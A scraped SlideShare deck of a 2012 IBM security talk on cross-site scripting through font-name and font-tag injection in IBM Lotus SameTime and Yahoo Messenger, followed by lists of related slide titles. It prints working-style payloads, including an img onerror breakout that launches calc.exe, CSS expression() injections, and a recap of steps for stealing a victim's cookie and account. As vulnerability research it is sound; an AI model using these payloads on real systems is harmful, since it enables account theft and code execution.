SlideShare a Scribd company logo
1 of 44
© 2012 IBM Corporation
IBM Security Systems
1© 2012 IBM Corporation
Stylish XSS
via Font Name Injection
© 2012 IBM Corporation
IBM Security Systems
2
Background - Instant Messengers
© 2012 IBM Corporation
IBM Security Systems
3
Background - Instant Messengers
<Text Style="
font-family:Segoe UI;
font-weight:bold;
font-style:italic;
color:#008000;
">Hi!</Text>
© 2012 IBM Corporation
IBM Security Systems
4
Background - Instant Messengers
Every time I’ve seen this screen, I wondered
“What if I could use some HTML here…”
© 2012 IBM Corporation
IBM Security Systems
5
Background - Windows Fonts
Windows accepts basically any character as
part of the font name
Font name length limited to ~30 chars
© 2012 IBM Corporation
IBM Security Systems
6
IBM Lotus SameTime Messenger
<span style="font-size:14pt;font-family:Segoe UI;
font-weight:normal;font-style:normal;">You Do!</span>
© 2012 IBM Corporation
IBM Security Systems
7
SameTime - Exploit - CSS
Font Name: expression(alert(1));
© 2012 IBM Corporation
IBM Security Systems
8
SameTime - Exploit - CSS
Font Name: expression(alert(1));
Desired output:
<span style= ";font-family:expression(alert(1));…">
Actual output:
<span style="">
© 2012 IBM Corporation
IBM Security Systems
9
SameTime - Exploit - New Attribute
Font Name: "onclick="alert(1)"
Desired output:
<span style="font-size:9pt;font-family:“
onclick="alert(1)" ...">
Actual output:
<span style="font-size:9pt;font-family:"
onclick="">
© 2012 IBM Corporation
IBM Security Systems
10
SameTime - Exploit
~50 Fonts Later
© 2012 IBM Corporation
IBM Security Systems
11
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
12
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>
Message Received:
<span style=“…font-family:
© 2012 IBM Corporation
IBM Security Systems
13
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>
Message Received:
<span style=“…font-family:e0”>
<img x='>
© 2012 IBM Corporation
IBM Security Systems
14
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
15
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">
© 2012 IBM Corporation
IBM Security Systems
16
SameTime - Exploit - Found
Message sent:
<span style=“…font-family:e0”
<<style<style</style>img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
Message Received:
<span style=“…font-family:e0”>
<img x='>Rest of Orig CSS">'
src='x'
onerror='location="c:windowssystem32calc.exe" '
</span>
© 2012 IBM Corporation
IBM Security Systems
17
SameTime – Remote Code Execution
<span style="font-size:14pt;font-family:e0">
<img x=';font-weight:normal;font-style:normal;">' src='x'
onerror='location="c:windowssystem32calc.exe"'</span>
© 2012 IBM Corporation
IBM Security Systems
18
Yahoo Messenger
© 2012 IBM Corporation
IBM Security Systems
19
Yahoo Messenger – Message View
Lots of Colors, but that’s about it…
© 2012 IBM Corporation
IBM Security Systems
20
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
21
Yahoo Messenger - History View
© 2012 IBM Corporation
IBM Security Systems
22
Yahoo Messenger - History View
Finally, Yahoo's
purple alert!
© 2012 IBM Corporation
IBM Security Systems
23
Yahoo Messenger - The Payload
<img src="x"onmouseover="alert(1)">
© 2012 IBM Corporation
IBM Security Systems
24
Yahoo Messenger - Digging Deeper
Wait, what?
It's not local?!
© 2012 IBM Corporation
IBM Security Systems
25
Yahoo Messenger - Digging Deeper
Accessing this URL in Chrome, yields the same
result.
© 2012 IBM Corporation
IBM Security Systems
26
Yahoo Messenger - Digging Deeper
That means I can read the cookie!
And steal your account!
© 2012 IBM Corporation
IBM Security Systems
27
Yahoo Messenger - Recap
1. Send the victim a message that contain malicious
HTML snippet
2. Wait 3-4 hours for it to show up in the history
3. Convince the user to access his history or send him
a direct link to it (after all, it not local)
4. Have the victim click the Instant Message from the
drop-down box
© 2012 IBM Corporation
IBM Security Systems
28
Yahoo Messenger - Introducing: Web Messenger!
Finally I can see the results of my attacks in
real time!
© 2012 IBM Corporation
IBM Security Systems
29
Yahoo Messenger - Web Messenger
During the tests, I noticed that a <Font> tag
sent as part of the message text, is being
rendered differently in the Web Messenger.
• The message:
<font face="xxx" size="20">33333</font>
• Was rendered as:
<font style="font-size:20pt" face="xxx“
id="yui_3_2_0_20_1330267588862427">33333</font>
© 2012 IBM Corporation
IBM Security Systems
30
Yahoo Messenger - Exploiting CSS
Add a new rule with an expression() call.
© 2012 IBM Corporation
IBM Security Systems
31
Yahoo Messenger - Exploiting CSS
Started With:
<font face=ssss size="1&color:red">xxxx</font>
To my surprise the response came back as I hoped
<font style="font-size:1&amp;color:red" >xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
32
Yahoo Messenger - Exploiting CSS
Next was the expression:
<font face=sssss size="1&color:expression(alert(1))"
>xxxx</font>
And again, it seems like nothing is filtering this...
<font style="font-size:1&amp;color:expression(alert(1))"
>xxxx</font>
© 2012 IBM Corporation
IBM Security Systems
33
Yahoo Messenger - Exploiting CSS
Time to open Internet Explorer!
© 2012 IBM Corporation
IBM Security Systems
34
Yahoo Web Messenger - IE Version
© 2012 IBM Corporation
IBM Security Systems
35
Yahoo Web Messenger - IE Version
The Rules (for IE):
1. The Size attribute must be surrounded by
double-quotes (" ")
2. The size value must be followed by the "pt;"
suffix
<font size="15pt;"> <font style="font-size=15pt;">
© 2012 IBM Corporation
IBM Security Systems
36
Yahoo Web Messenger - IE Version
By tweaking the size value,
a new Font-Family CSS rule could be injected.
<font size="15pt;font-family:aaaa;">
<font style="font-size=15pt;font-family: aaaa;">
© 2012 IBM Corporation
IBM Security Systems
37
Yahoo Web Messenger - IE Version
With all that in mind, and ~30 <Font> tags later,
came the following payload that bypass the
CSS filtering
<font size="15pt;font-family:expression(alert(1));">
© 2012 IBM Corporation
IBM Security Systems
38
Yahoo Web Messenger - IE Version
It should work correctly according to the rendered source in
IE Developer Tools
© 2012 IBM Corporation
IBM Security Systems
39
Yahoo Web Messenger - IE Version
Yet somehow, no alert
© 2012 IBM Corporation
IBM Security Systems
40
Yahoo Web Messenger - Uber Meta!
After ~5 hours of more fiddling and long lonely IM chats
with myself
I finally found out what I was afraid of.
Or in other words, The "No Expression For You" Meta Tag
<meta http-equiv="X-UA-Compatible" content="IE=8"/>
© 2012 IBM Corporation
IBM Security Systems
41
Yahoo Web Messenger - Going Old School
Fired up my Windows XP VM
and kicked out IE8
© 2012 IBM Corporation
IBM Security Systems
42
Yahoo Web Messenger - Finally
© 2012 IBM Corporation
IBM Security Systems
43
Yahoo Messenger - History Window
© 2012 IBM Corporation
IBM Security Systems
44
Questions?

More Related Content

What's hot

Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014Scott Wlaschin
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Rishabh Upadhyay
 
Fluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-VFluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-VChris Swan
 
16. Java stacks and queues
16. Java stacks and queues16. Java stacks and queues
16. Java stacks and queuesIntro C# Book
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationChris Gates
 
The lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of testsThe lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of testsScott Wlaschin
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
Exception Handling
Exception HandlingException Handling
Exception HandlingSunil OS
 
Alphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 IAlphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 IAlphorm
 
DerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack MethodsDerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack MethodsPatrick Coble
 
React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작Taegon Kim
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみようHokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみようPanda Yamaki
 
Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018John De Goes
 

What's hot (20)

Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014Domain Driven Design with the F# type System -- F#unctional Londoners 2014
Domain Driven Design with the F# type System -- F#unctional Londoners 2014
 
Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing Ethical Hacking and Penetration Testing
Ethical Hacking and Penetration Testing
 
Fluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-VFluttercon Berlin 23 - Dart & Flutter on RISC-V
Fluttercon Berlin 23 - Dart & Flutter on RISC-V
 
16. Java stacks and queues
16. Java stacks and queues16. Java stacks and queues
16. Java stacks and queues
 
Client-Side Penetration Testing Presentation
Client-Side Penetration Testing PresentationClient-Side Penetration Testing Presentation
Client-Side Penetration Testing Presentation
 
The lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of testsThe lazy programmer's guide to writing thousands of tests
The lazy programmer's guide to writing thousands of tests
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
A Threat Hunter Himself
A Threat Hunter HimselfA Threat Hunter Himself
A Threat Hunter Himself
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Exception Handling
Exception HandlingException Handling
Exception Handling
 
Alphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 IAlphorm.com Formation CEHV9 I
Alphorm.com Formation CEHV9 I
 
Dns spoofing kali linux
Dns spoofing kali linuxDns spoofing kali linux
Dns spoofing kali linux
 
DSC program.pdf
DSC program.pdfDSC program.pdf
DSC program.pdf
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
DerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack MethodsDerbyCon 7 - Hacking VDI, Recon and Attack Methods
DerbyCon 7 - Hacking VDI, Recon and Attack Methods
 
React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작React Native를 사용한
 초간단 커뮤니티 앱 제작
React Native를 사용한
 초간단 커뮤니티 앱 제작
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
 
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみようHokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
Hokkaido.cap#2 一般的なプロトコルのパケットを覗いてみよう
 
Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018Blazing Fast, Pure Effects without Monads — LambdaConf 2018
Blazing Fast, Pure Effects without Monads — LambdaConf 2018
 

Viewers also liked

Viewers also liked (13)

Expedited Removal Article_NM
Expedited Removal Article_NMExpedited Removal Article_NM
Expedited Removal Article_NM
 
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayuPeluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
Peluasan kuasa British melalui perjanjian terhadap negeri-negeri melayu
 
BICSI NEC ARTICLE
BICSI NEC ARTICLEBICSI NEC ARTICLE
BICSI NEC ARTICLE
 
hjm
hjmhjm
hjm
 
rbusinessreport
rbusinessreportrbusinessreport
rbusinessreport
 
SECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATIONSECURITY SYSTEM INTEGRATION
SECURITY SYSTEM INTEGRATION
 
NewMetricsforCCTV_edited
NewMetricsforCCTV_editedNewMetricsforCCTV_edited
NewMetricsforCCTV_edited
 
CIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMSCIRCLES OF COVERAGE FOR TELECOM ROOMS
CIRCLES OF COVERAGE FOR TELECOM ROOMS
 
Untitled Presentation
Untitled PresentationUntitled Presentation
Untitled Presentation
 
AV system and lighting controls integration
AV system and lighting controls integrationAV system and lighting controls integration
AV system and lighting controls integration
 
حب الوطن من الايمان
حب الوطن من الايمانحب الوطن من الايمان
حب الوطن من الايمان
 
Syarikat multinasional
Syarikat multinasionalSyarikat multinasional
Syarikat multinasional
 
Ensayo
Ensayo Ensayo
Ensayo
 

Similar to Stylish XSS

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfdistortdistort
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Languagesghctoma
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandboxNephi Johnson
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016Pavan Kumar
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pagesNilesh Bafna
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Malware analysis
Malware analysisMalware analysis
Malware analysisDen Iir
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?James Montemagno
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientAngelo Dell'Aera
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeAman Kohli
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...OW2
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...Carl Tyler
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Haytham Ghandour
 

Similar to Stylish XSS (20)

Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Usb hack
Usb hackUsb hack
Usb hack
 
eXploitable Markup Language
eXploitable Markup LanguageeXploitable Markup Language
eXploitable Markup Language
 
Google chrome sandbox
Google chrome sandboxGoogle chrome sandbox
Google chrome sandbox
 
Securing your web applications in CF 2016
Securing your web applications in CF 2016Securing your web applications in CF 2016
Securing your web applications in CF 2016
 
Building high performing web pages
Building high performing web pagesBuilding high performing web pages
Building high performing web pages
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
What's new in Xamarin.Forms?
What's new in Xamarin.Forms?What's new in Xamarin.Forms?
What's new in Xamarin.Forms?
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Thug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclientThug: a new low-interaction honeyclient
Thug: a new low-interaction honeyclient
 
Hacking_PPT
Hacking_PPT Hacking_PPT
Hacking_PPT
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
Best Practices & Lessons Learned from the field on EMC Documentum xCP 2.0
 

Recently uploaded

Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...FIDO Alliance
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
How to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in PakistanHow to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in Pakistandanishmna97
 
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...ScyllaDB
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)Wonjun Hwang
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptxFIDO Alliance
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingScyllaDB
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Paige Cruz
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch TuesdayIvanti
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsLeah Henrickson
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctBrainSell Technologies
 
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?Paolo Missier
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024Lorenzo Miniero
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxMasterG
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxjbellis
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data SciencePaolo Missier
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 

Recently uploaded (20)

Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
How to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in PakistanHow to Check GPS Location with a Live Tracker in Pakistan
How to Check GPS Location with a Live Tracker in Pakistan
 
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
Event-Driven Architecture Masterclass: Integrating Distributed Data Stores Ac...
 
CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)CORS (Kitworks Team Study 양다윗 발표자료 240510)
CORS (Kitworks Team Study 양다윗 발표자료 240510)
 
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider  Progress from Awareness to Implementation.pptxTales from a Passkey Provider  Progress from Awareness to Implementation.pptx
Tales from a Passkey Provider Progress from Awareness to Implementation.pptx
 
Event-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream ProcessingEvent-Driven Architecture Masterclass: Challenges in Stream Processing
Event-Driven Architecture Masterclass: Challenges in Stream Processing
 
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
Observability Concepts EVERY Developer Should Know (DevOpsDays Seattle)
 
2024 May Patch Tuesday
2024 May Patch Tuesday2024 May Patch Tuesday
2024 May Patch Tuesday
 
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on ThanabotsContinuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
Continuing Bonds Through AI: A Hermeneutic Reflection on Thanabots
 
Overview of Hyperledger Foundation
Overview of Hyperledger FoundationOverview of Hyperledger Foundation
Overview of Hyperledger Foundation
 
ERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage IntacctERP Contender Series: Acumatica vs. Sage Intacct
ERP Contender Series: Acumatica vs. Sage Intacct
 
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
(Explainable) Data-Centric AI: what are you explaininhg, and to whom?
 
WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptxCyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
Cyber Insurance - RalphGilot - Embry-Riddle Aeronautical University.pptx
 
Vector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptxVector Search @ sw2con for slideshare.pptx
Vector Search @ sw2con for slideshare.pptx
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
Design and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data ScienceDesign and Development of a Provenance Capture Platform for Data Science
Design and Development of a Provenance Capture Platform for Data Science
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 

Stylish XSS

  • 1. © 2012 IBM Corporation IBM Security Systems 1© 2012 IBM Corporation Stylish XSS via Font Name Injection
  • 2. © 2012 IBM Corporation IBM Security Systems 2 Background - Instant Messengers
  • 3. © 2012 IBM Corporation IBM Security Systems 3 Background - Instant Messengers <Text Style=" font-family:Segoe UI; font-weight:bold; font-style:italic; color:#008000; ">Hi!</Text>
